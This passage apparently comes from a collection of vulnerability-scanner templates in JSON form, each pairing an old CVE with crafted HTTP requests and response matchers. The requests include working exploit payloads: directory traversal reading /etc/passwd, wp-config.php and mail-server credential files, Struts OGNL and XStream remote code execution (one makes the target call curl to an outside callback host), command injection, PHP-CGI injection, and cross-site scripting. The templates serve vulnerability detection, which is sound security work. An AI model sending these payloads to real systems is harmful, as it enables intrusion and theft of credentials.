Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root=.*:0:0"]}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Duplicator - WordPress Migration"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["traffic analy","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-3010","info":{"name":"Alcatel-Lucent OmniPCX - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"word","part":"body","words":["<TITLE>master</TITLE>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-2449","info":{"name":"Apache Tomcat 4.x-7.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Request URI: /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp","JSP Request Method"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["2 Click Social Media Buttons","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-FaceThumb ==="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Wordpress Integrator"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["MF Gig Calendar ="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["All-in-One Event Calendar"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Download Monitor ="]}]},{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/yousaytoo-auto-publishing-plugin/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5(\"{{string}}\");?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Code 